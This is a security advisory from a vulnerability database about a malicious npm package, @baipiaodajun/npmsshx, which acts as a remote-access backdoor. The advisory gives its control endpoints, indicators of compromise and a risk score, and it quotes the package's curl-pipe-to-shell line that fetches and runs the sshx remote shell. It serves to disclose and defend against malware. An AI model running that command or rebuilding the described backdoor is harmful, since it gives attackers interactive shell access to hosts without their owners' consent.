VDB
GCVE-110-OSM-2026-6492
GCVE-110-OSM-2026-6492
Advisory PublishedCVSS 8.8/10
This package is a remote-access backdoor that installs an HTTP control panel exposing endpoints to execute arbitrary shell commands (/run), enumerate filesystem contents (/home, /tmp), list running processes (/process), and — critically — download and execute the sshx remote shell tool via `curl -sSf https://sshx.io/get | sh -s run`. The attacker model is persistent remote access: once deployed, an authenticated user (auth code passed as argv[2]) can obtain an sshx tunnel URL via /getssh, giving interactive shell access to the host. The publisher 'liming2038' has a prior confirmed malicious package (kisama-js, severity: high), and the package name itself references sshx, consistent with intentional tooling for unauthorized remote access rather than accidental misuse. The curl-pipe-shell execution of a remotely fetched binary combined with a web-accessible control surface is a clear attacker-controlled persistence mechanism.
ENTRY
index.js (bin: index.js)
DESTINATION
- custom-c2: https://sshx.io/get (primary, plaintext) in index.js
- custom-c2: sshx.io (plaintext) in index.js
EXFIL
- Data Encoding for Exfiltration in index.js: "encodeURIComponent(req.originalUrl"
- Curl/Wget Pipe to Shell in index.js: "curl -sSf https://sshx.io/get | sh"
ADDITIONAL FINDINGS
- Shell Command Execution in index.js: "require('child_process')"
- Publisher Has Other Malicious Packages
- Malicious Dependency Detected in package.json
PAYLOAD FILES
index.js
INDICATORS (IOCs)
- payloadFileHash: 917494ecc2195413efd9f433b4359f5f032b80616e5a084766becb2a82e2bfe0
Weaknesses (CWE)
CWE-506Embedded Malicious Code
Risk Scores
CVSS 3.1
8.8/10
High · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Affected Products
| Vendor | Product | Versions | Platforms |
|---|---|---|---|
| unknown | @baipiaodajun/npmsshx | all (affected) | — |
Browse GCVE Records
73,393 records in the GCVE database · Updated July 17, 2026
No matching records found.
Explore Further
Investigate this vulnerability in the interactive console or download the raw GCVE record.